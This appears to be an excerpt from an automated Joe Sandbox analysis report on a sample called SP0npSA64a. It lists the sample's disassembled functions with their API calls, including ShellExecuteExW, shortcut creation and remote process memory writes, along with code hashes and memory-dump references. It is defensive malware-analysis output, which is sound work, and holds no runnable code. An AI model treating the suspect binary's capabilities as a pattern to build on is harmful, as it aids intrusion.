                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 1042038666-0
                                                                                  • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                  • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                  • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                  • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2625713937-0
                                                                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0041780F
                                                                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                  • __getptd.LIBCMT ref: 00417826
                                                                                  • __amsg_exit.LIBCMT ref: 00417834
                                                                                  • __lock.LIBCMT ref: 00417844
                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                  • String ID:
                                                                                  • API String ID: 938513278-0
                                                                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                  APIs
                                                                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                  • ExitThread.KERNEL32 ref: 00413D4E
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                  • __freefls@4.LIBCMT ref: 00413D74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                  • String ID:
                                                                                  • API String ID: 2403457894-0
                                                                                  • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                  • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                  • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                  • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                  APIs
                                                                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                  • ExitThread.KERNEL32 ref: 004151ED
                                                                                  • __freefls@4.LIBCMT ref: 00415209
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                  • String ID:
                                                                                  • API String ID: 4247068974-0
                                                                                  • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                  • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                  • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                  • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: )$U$\
                                                                                  • API String ID: 0-3705770531
                                                                                  • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                  • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                  • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                  • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                  APIs
                                                                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                  • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                  • CoUninitialize.OLE32 ref: 0046E53D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 886957087-24824748
                                                                                  • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                  • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                  • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                  • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: \
                                                                                  • API String ID: 4104443479-2967466578
                                                                                  • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                  • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                  • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                  • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: \
                                                                                  • API String ID: 4104443479-2967466578
                                                                                  • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                  • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                  • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                  • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: \
                                                                                  • API String ID: 4104443479-2967466578
                                                                                  • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                  • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                  • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                  • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                  Strings
                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                  • API String ID: 708495834-557222456
                                                                                  • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                  • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                  • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                  • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                  APIs
                                                                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                  • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                  • CoUninitialize.OLE32 ref: 0047863C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 886957087-24824748
                                                                                  • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                  • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                  • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                  • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                  APIs
                                                                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                  • String ID: @
                                                                                  • API String ID: 4150878124-2766056989
                                                                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: \$]$h
                                                                                  • API String ID: 4104443479-3262404753
                                                                                  • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                  • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                  • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                  • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                  APIs
                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                  • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
